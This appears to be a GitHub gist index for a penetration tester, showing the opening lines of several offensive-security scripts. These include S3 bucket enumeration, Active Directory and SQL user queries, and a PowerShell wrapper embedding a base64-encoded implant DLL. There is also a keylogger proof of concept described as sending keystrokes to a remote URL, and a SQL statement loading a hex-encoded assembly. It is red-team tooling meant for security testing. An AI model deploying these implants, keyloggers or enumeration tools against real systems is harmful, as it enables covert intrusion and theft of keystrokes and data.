Scott Sutherland nullbind
nullbind
/ Get-PublicAwsS3BucketList.ps1
Created
October 17, 2018 15:16
Get-PublicAwsS3BucketList.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # --------------------------------- | |
| # Get-PublicAwsS3BucketList | |
| # --------------------------------- | |
| # Author: Scott Sutherland (@_nullbind), NetSPI 2018 | |
| # Version: 0.5 | |
| # Description: This Function can be used to obtain a list of keys (files) stored in AWS s3 buckets. | |
| # it also supports feed guessing s3 buckets based on a list of domains which is can perform permutations on. | |
| # S3 buckets that have been make publically readable. | |
| # Ref: https://docs.aws.amazon.com/AmazonS3/latest/API/v2-RESTBucketGET.html | |
| # Ref: https://docs.aws.amazon.com/AmazonS3/latest/dev/using-with-s3-actions.html#using-with-s3-actions-related-to-buckets |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ------------------------------------------- | |
| # Function: Get-IPrange | |
| # ------------------------------------------- | |
| # Author: BarryCWT | |
| # Reference: https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b | |
| function Get-IPrange | |
| { | |
| <# | |
| .SYNOPSIS | |
| Get the IP addresses in a range |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ------------------------------------------- | |
| # Function: Get-DomainObject | |
| # ------------------------------------------- | |
| # Based on Get-ADObject function from: | |
| # https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1 | |
| function Get-DomainObject | |
| { | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory=$false, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ---------------------------------- | |
| # Get-SQLDomainUser | |
| # ---------------------------------- | |
| # Author: Scott Sutherland | |
| Function Get-SQLDomainUser | |
| { | |
| <# | |
| .SYNOPSIS | |
| Using the OLE DB ADSI provider, query Active Directory for a list of domain users | |
| via the domain logon server associated with the SQL Server. This can be |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -------------------------------------------- | |
| # Create Form | |
| # -------------------------------------------- | |
| # Create primary form | |
| Add-Type -AssemblyName System.Windows.Forms | |
| $Form = New-Object system.Windows.Forms.Form | |
| $Form.Text = "" | |
| #$Form.Opacity = 0.98 # 1.0 is fully opaque; 0.0 is invisible |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is just a basic PowerShell wrapper for Alexander Leary's WheresMyImplant.dll. | |
| # Source: https://github.com/0xbadjuju/WheresMyImplant/releases | |
| # Note: This was hacked together for the sake of portability. | |
| # Note: To refresh WheresMyImplant.dll do the following: | |
| # $WMIBytes = [System.IO.File]::ReadAllBytes("C:\temp\WheresMyImplant.dll") | |
| # $WMIString = [System.Convert]::ToBase64String($WMIBytes) | |
| # Todo: Write wrapper functions in PowerShell, aaand maybe compress it :). In the meantime a RunCMD method example is below. Create test files and pester tests. | |
| # The WheresMyImplant.dll | |
| $WMIString = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANqo8FkAAAAAAAAAAOAAAiELAQgAABoBAAAGAAAAAAAA7jgBAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQAAAgAA7TQBAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJg4AQBTAAAAAEABADgDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAOAEAHAAAAAAAAAAAAAAAAAA |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is a stand alone script to create a basic WMI provider for testing detective controls | |
| # Author: Scott Sutherland, @_nullbind, NetSPI 2017 | |
| # ----------------------------------- | |
| # Setup and Compile WMI Provider DLL | |
| # ----------------------------------- | |
| # Status user | |
| write-output " * Generating WMI provider C# Code" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is a rough PoC based on https://www.tarlogic.com/en/blog/how-to-create-keylogger-in-powershell/ | |
| # Logging to file works | |
| # Timer doesnt work (start runspace and kill it after a timeout) | |
| # HTTP exfil doesnt work (add post function) | |
| Function Invoke-MavisBeacon | |
| { | |
| <# | |
| .SYNOPSIS | |
| This is a script of logging keys to a file and sending them to a remote URL. Mostly, it just a joke |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- Change the assembly name to the one you want to replace | |
| CREATE ASSEMBLY [CommonLib] FROM | |
| 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103009D50D2590000000000000000E00002210B010B000012000000060000000000000E300000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000B42F00005700000000400000A802000000000000000000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000014100000002000000012000000020000000000000000000000000000200000602E72737263000000A8020000004000000004000000140000000000000000000000000000400000402E72656C6F6300000C |
nullbind
/ encryptdecryptfunction-cow.cs
Last active
October 15, 2018 19:40
encryptdecryptfunction-cow.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Data; | |
| using System.Data.SqlClient; | |
| using System.Data.SqlTypes; | |
| using Microsoft.SqlServer.Server; | |
| using System.Security.Cryptography; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Text; |